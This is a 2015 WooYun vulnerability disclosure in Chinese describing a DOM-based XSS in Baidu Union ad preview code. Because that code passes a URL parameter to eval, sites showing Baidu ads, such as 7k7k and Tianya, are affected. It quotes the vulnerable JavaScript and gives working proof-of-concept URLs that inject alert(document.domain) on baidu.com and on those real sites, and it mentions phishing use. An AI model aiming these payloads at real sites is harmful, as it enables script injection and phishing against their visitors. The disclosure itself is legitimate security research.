当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098803

漏洞标题:百度联盟代码缺陷导致使用百度推广的网站存在DOM XSS II

相关厂商:百度

漏洞作者: jsbug

提交时间:2015-03-02 11:54

修复时间:2015-04-16 11:56

公开时间:2015-04-16 11:56

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

闪电果然是看脸的。

详细说明:

还是上次的代码,仅仅修补了JSON。接着往下走。

http://news.7k7k.com/gf/
?bd_cpro_prev={"selectScale":10010,"showUrl":"http://wm.baidu.com","src":"","type":2,"title":"","isUpload":"0","imgWidth":"960","imgHeight":"60","imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x60.jpg","image":[10009,10007,10010,10013,10006,10015,10014],"tip":0,"linkUrl":"http://wm.baidu.com","imgTitle":"","des1":"","des2":""}


会载入框架image.html

1.png


上次说能自己修改图片看怎么处理的。

window.onload = function () {
var a = 'bd_cpro_prev';
var f = baidu.url.parseQuery(window.location.href.replace(/%252e/g, '%2e'), a).replace(/^#/, '');
var b = e(f);
d(b);
if (b.tip == 1) {
c()
}
function e(i) {
var g = decodeURIComponent(i);
var h = g.replace(/\\x1e/g, '&').replace(/\\x1d/g, '=').replace(/\\x1c/, '?').replace(/\\x5c/, '\\').replace(/\\x/g, '');
return baidu.json.decode(h)
}


location.href里还是处理bd_cpro_prev,没有任何过滤,还帮解码一些字符,然后baidu.json.decode

baidu.json.decode = function (string) {
return eval('(' + string + ')')
};


然后就没有然后了。
http://cpro.baidu.com/cpro/ui/preview/templates/image.html?bd_cpro_prev=alert(1)

4.png


值得庆幸的是,这次是baidu域下的XSS,不会影响到当前站,拿来钓钓鱼什么的还行。

漏洞证明:

直接给代码,还是以天涯和7K7K为例:

http://news.7k7k.com/rxjlp/
?bd_cpro_prev={"selectScale":10010,"showUrl":"http://wm.baidu.com","src":"","type":2,"title":"","isUpload":"0","imgWidth":"960","imgHeight":"60","imgUrl":"http://zone.wooyun.org/themes/wooyun/images/logo.png\x5c" onload=alert(document.domain)//","image":[10009,10007,10010,10013,10006,10015,10014],"tip":0,"linkUrl":"http://wm.baidu.com","imgTitle":"","des1":"","des2":""}


2.png


http://bbs.tianya.cn/post-funinfo-6201480-1.shtml
?bd_cpro_prev={"selectScale":10009,"showUrl":"http://wm.baidu.com","src":"","type":2,"title":"","isUpload":"0","imgWidth":"960","imgHeight":"90","imgUrl":"http://zone.wooyun.org/themes/wooyun/images/logo.png\x5c" onload=alert(document.domain)//","image":[10009,10013,10015],"tip":0,"linkUrl":"http://wm.baidu.com","imgTitle":"","des1":"","des2":""}


3.png

修复方案:

不说你也知道。

版权声明:转载请注明来源 jsbug@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-03-02 21:23

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无


漏洞评价:

评论